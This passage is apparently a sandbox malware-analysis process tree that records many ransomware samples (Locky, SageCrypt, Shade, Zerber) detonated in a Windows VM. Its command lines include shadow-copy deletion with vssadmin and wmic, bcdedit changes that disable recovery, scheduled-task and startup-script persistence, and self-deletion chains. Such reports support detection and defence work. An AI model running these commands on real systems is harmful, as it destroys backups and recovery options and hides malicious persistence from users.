                                                                                              C:\Windows\system32\svchost.exe
                                                                                              8⤵
                                                                                                PID:3472
                                                                                  • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Locky.bil-59726f506e6934323d6484e0748b96e9a315cff574a777a8b50c6879e3e57816.exe
                                                                                    Trojan-Ransom.Win32.Locky.bil-59726f506e6934323d6484e0748b96e9a315cff574a777a8b50c6879e3e57816.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                    PID:2480
                                                                                  • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Locky.xou-3a345668f7f83513248b6099174176b7a4e4b90aa17e6f8a3bbd0d7e0533d415.exe
                                                                                    Trojan-Ransom.Win32.Locky.xou-3a345668f7f83513248b6099174176b7a4e4b90aa17e6f8a3bbd0d7e0533d415.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:3048
                                                                                    • C:\Windows\splwow64.exe
                                                                                      C:\Windows\splwow64.exe 12288
                                                                                      3⤵
                                                                                        PID:2920
                                                                                      • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\DesktopOSIRIS.htm
                                                                                        3⤵
                                                                                          PID:3932
                                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3932 CREDAT:275457 /prefetch:2
                                                                                            4⤵
                                                                                              PID:2036
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys9F0.tmp"
                                                                                            3⤵
                                                                                              PID:3824
                                                                                          • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.SageCrypt.pf-62cce749fcfaf6ffc33593f37510701268d21d75f09d15a2d8545f341a4426d8.exe
                                                                                            Trojan-Ransom.Win32.SageCrypt.pf-62cce749fcfaf6ffc33593f37510701268d21d75f09d15a2d8545f341a4426d8.exe
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Windows directory
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                            PID:1508
                                                                                            • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.SageCrypt.pf-62cce749fcfaf6ffc33593f37510701268d21d75f09d15a2d8545f341a4426d8.exe
                                                                                              "C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.SageCrypt.pf-62cce749fcfaf6ffc33593f37510701268d21d75f09d15a2d8545f341a4426d8.exe" g
                                                                                              3⤵
                                                                                                PID:1960
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                "C:\Windows\System32\schtasks.exe" /CREATE /TN "ZSxk8uCy" /TR "C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:3000
                                                                                              • C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe"
                                                                                                3⤵
                                                                                                  PID:2584
                                                                                                  • C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe" g
                                                                                                    4⤵
                                                                                                      PID:2308
                                                                                                      • C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe" g
                                                                                                        5⤵
                                                                                                          PID:3144
                                                                                                        • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                          "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                          5⤵
                                                                                                          • Interacts with shadow copies
                                                                                                          PID:4036
                                                                                                        • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                          "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                          5⤵
                                                                                                          • Interacts with shadow copies
                                                                                                          PID:912
                                                                                                        • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                          "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                          5⤵
                                                                                                          • Interacts with shadow copies
                                                                                                          PID:2260
                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                          5⤵
                                                                                                            PID:1664
                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                                                            5⤵
                                                                                                              PID:3628
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              "C:\Windows\System32\schtasks.exe" /DELETE /TN /F "ZSxk8uCy"
                                                                                                              5⤵
                                                                                                                PID:1488
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\__config16184093.bat"
                                                                                                                5⤵
                                                                                                                  PID:2812
                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                4⤵
                                                                                                                • Interacts with shadow copies
                                                                                                                PID:1592
                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                4⤵
                                                                                                                • Interacts with shadow copies
                                                                                                                PID:3328
                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                4⤵
                                                                                                                • Interacts with shadow copies
                                                                                                                PID:3192
                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                                4⤵
                                                                                                                  PID:3336
                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                                                                  4⤵
                                                                                                                    PID:3376
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    "C:\Windows\System32\schtasks.exe" /DELETE /TN /F "ZSxk8uCy"
                                                                                                                    4⤵
                                                                                                                      PID:3456
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\__config16184093.bat"
                                                                                                                      4⤵
                                                                                                                        PID:3480
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\__config252888.bat"
                                                                                                                      3⤵
                                                                                                                        PID:1972
                                                                                                                        • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                                                                                          4⤵
                                                                                                                            PID:2468
                                                                                                                            • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                                                                                              5⤵
                                                                                                                                PID:2592
                                                                                                                        • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.SageCrypt.yd-fad9b4e7b7eac1a47780f55a9d95ebb7c36e464331a2dd3263035f1d29267bdd.exe
                                                                                                                          Trojan-Ransom.Win32.SageCrypt.yd-fad9b4e7b7eac1a47780f55a9d95ebb7c36e464331a2dd3263035f1d29267bdd.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:1140
                                                                                                                          • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.SageCrypt.yd-fad9b4e7b7eac1a47780f55a9d95ebb7c36e464331a2dd3263035f1d29267bdd.exe
                                                                                                                            "C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.SageCrypt.yd-fad9b4e7b7eac1a47780f55a9d95ebb7c36e464331a2dd3263035f1d29267bdd.exe" g
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:2320
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            "C:\Windows\System32\schtasks.exe" /CREATE /TN "ZSxk8uCy" /TR "C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                                            3⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                            PID:2044
                                                                                                                          • C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe"
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:1792
                                                                                                                            • C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\1KzrRWCy.exe" g
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1132
                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                              "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                              4⤵
                                                                                                                              • Interacts with shadow copies
                                                                                                                              PID:2560
                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                              "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                              4⤵
                                                                                                                              • Interacts with shadow copies
                                                                                                                              PID:2380
                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                              "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                              4⤵
                                                                                                                              • Interacts with shadow copies
                                                                                                                              PID:2044
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                                              4⤵
                                                                                                                                PID:2944
                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                                                                                4⤵
                                                                                                                                  PID:216
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  "C:\Windows\System32\schtasks.exe" /DELETE /TN /F "ZSxk8uCy"
                                                                                                                                  4⤵
                                                                                                                                    PID:1740
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\__config16184093.bat"
                                                                                                                                    4⤵
                                                                                                                                      PID:300
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                                                                                                        5⤵
                                                                                                                                          PID:1808
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:2084
                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                                7⤵
                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                PID:632
                                                                                                                                              • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                                                                                                                                7⤵
                                                                                                                                                  PID:2020
                                                                                                                                                • C:\Windows\System32\bcdedit.exe
                                                                                                                                                  "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
                                                                                                                                                  7⤵
                                                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                                                  PID:2480
                                                                                                                                                • C:\Windows\System32\bcdedit.exe
                                                                                                                                                  "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                  7⤵
                                                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                                                  PID:2336
                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 2
                                                                                                                                              5⤵
                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                              • Runs ping.exe
                                                                                                                                              PID:2788
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\__config252888.bat"
                                                                                                                                          3⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                          PID:1056
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\mtstocom.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\mtstocom.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious use of UnmapMainImage
                                                                                                                                            PID:2556
                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 2
                                                                                                                                            4⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:2040
                                                                                                                                      • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Shade.lpz-f9019a3c25f900c0b730a79059072e8622bf493bfa800f9d7d1658e96aeaa9e9.exe
                                                                                                                                        Trojan-Ransom.Win32.Shade.lpz-f9019a3c25f900c0b730a79059072e8622bf493bfa800f9d7d1658e96aeaa9e9.exe
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:1048
                                                                                                                                        • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Shade.lpz-f9019a3c25f900c0b730a79059072e8622bf493bfa800f9d7d1658e96aeaa9e9.exe
                                                                                                                                          Trojan-Ransom.Win32.Shade.lpz-f9019a3c25f900c0b730a79059072e8622bf493bfa800f9d7d1658e96aeaa9e9.exe
                                                                                                                                          3⤵
                                                                                                                                            PID:1384
                                                                                                                                        • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Shade.lqc-b9d129896e5b69dbdbc8a19f7e2ca3b31f025708eeebb2eec84595a1ad4cc517.exe
                                                                                                                                          Trojan-Ransom.Win32.Shade.lqc-b9d129896e5b69dbdbc8a19f7e2ca3b31f025708eeebb2eec84595a1ad4cc517.exe
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:2940
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Shade.lqc-b9d129896e5b69dbdbc8a19f7e2ca3b31f025708eeebb2eec84595a1ad4cc517.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                                                                                            3⤵
                                                                                                                                              PID:2868
                                                                                                                                            • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Shade.lqc-b9d129896e5b69dbdbc8a19f7e2ca3b31f025708eeebb2eec84595a1ad4cc517.exe
                                                                                                                                              C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Shade.lqc-b9d129896e5b69dbdbc8a19f7e2ca3b31f025708eeebb2eec84595a1ad4cc517.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:1912
                                                                                                                                          • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.czzb-708980062f0a75ede8f46ca9e329f05998859f5638b99cde579f2d07e5148e1c.exe
                                                                                                                                            Trojan-Ransom.Win32.Zerber.czzb-708980062f0a75ede8f46ca9e329f05998859f5638b99cde579f2d07e5148e1c.exe
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                            PID:2288
                                                                                                                                            • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.czzb-708980062f0a75ede8f46ca9e329f05998859f5638b99cde579f2d07e5148e1c.exe
                                                                                                                                              Trojan-Ransom.Win32.Zerber.czzb-708980062f0a75ede8f46ca9e329f05998859f5638b99cde579f2d07e5148e1c.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:2432
                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_READ_THIS_FILE_5VVGK0AG_.hta"
                                                                                                                                                4⤵
                                                                                                                                                  PID:1088
                                                                                                                                                • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_READ_THIS_FILE_D7M5YUS_.txt
                                                                                                                                                  4⤵
                                                                                                                                                  • Opens file in notepad (likely ransom note)
                                                                                                                                                  PID:696
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:3676
                                                                                                                                              • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.eck-a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b.exe
                                                                                                                                                Trojan-Ransom.Win32.Zerber.eck-a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b.exe
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:2096
                                                                                                                                                • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.eck-a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b.exe
                                                                                                                                                  Trojan-Ransom.Win32.Zerber.eck-a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Adds policy Run key to start application
                                                                                                                                                  • Drops startup file
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Modifies Control Panel
                                                                                                                                                  PID:2740
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.eck-a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.eck-a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b.exe" > NUL
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                    PID:2416
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.eck-a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:1556
                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                      ping -n 1 127.0.0.1
                                                                                                                                                      5⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:2884
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:2060
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:1764
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.eck-a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.eck-a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b.exe" > NUL
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                    PID:2436
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.eck-a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:2380
                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                      ping -n 1 127.0.0.1
                                                                                                                                                      5⤵
                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:2160
                                                                                                                                              • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.fcuw-830ec437d45b84c27e88353372459a1848887a5e9701e125f287dd20cc6ecda2.exe
                                                                                                                                                Trojan-Ransom.Win32.Zerber.fcuw-830ec437d45b84c27e88353372459a1848887a5e9701e125f287dd20cc6ecda2.exe
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                PID:2952
                                                                                                                                                • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.fcuw-830ec437d45b84c27e88353372459a1848887a5e9701e125f287dd20cc6ecda2.exe
                                                                                                                                                  Trojan-Ransom.Win32.Zerber.fcuw-830ec437d45b84c27e88353372459a1848887a5e9701e125f287dd20cc6ecda2.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:1732
                                                                                                                                              • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.jcb-4ced5a79defaa287008fc4481485edbd31b213b1fbbc0ae4aab7b27f6b037515.exe
                                                                                                                                                Trojan-Ransom.Win32.Zerber.jcb-4ced5a79defaa287008fc4481485edbd31b213b1fbbc0ae4aab7b27f6b037515.exe
                                                                                                                                                2⤵
                                                                                                                                                • Adds policy Run key to start application
                                                                                                                                                • Drops startup file
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Adds Run key to start application
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Modifies Control Panel
                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                • Suspicious use of UnmapMainImage
                                                                                                                                                PID:2728
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\mtstocom.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\mtstocom.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  • Suspicious use of UnmapMainImage
                                                                                                                                                  PID:2720
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.jcb-4ced5a79defaa287008fc4481485edbd31b213b1fbbc0ae4aab7b27f6b037515.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.jcb-4ced5a79defaa287008fc4481485edbd31b213b1fbbc0ae4aab7b27f6b037515.exe" > NUL
                                                                                                                                                  3⤵
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                  PID:2636
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.jcb-4ced5a79defaa287008fc4481485edbd31b213b1fbbc0ae4aab7b27f6b037515.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:2848
                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    ping -n 1 127.0.0.1
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                    • Runs ping.exe
                                                                                                                                                    PID:1144
                                                                                                                                              • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.tal-22e915979fce372775d6f34046cdcbdf63d52c99ff844c8264ebbb3423c9216c.exe
                                                                                                                                                Trojan-Ransom.Win32.Zerber.tal-22e915979fce372775d6f34046cdcbdf63d52c99ff844c8264ebbb3423c9216c.exe
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                PID:2888
                                                                                                                                                • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Zerber.tal-22e915979fce372775d6f34046cdcbdf63d52c99ff844c8264ebbb3423c9216c.exe
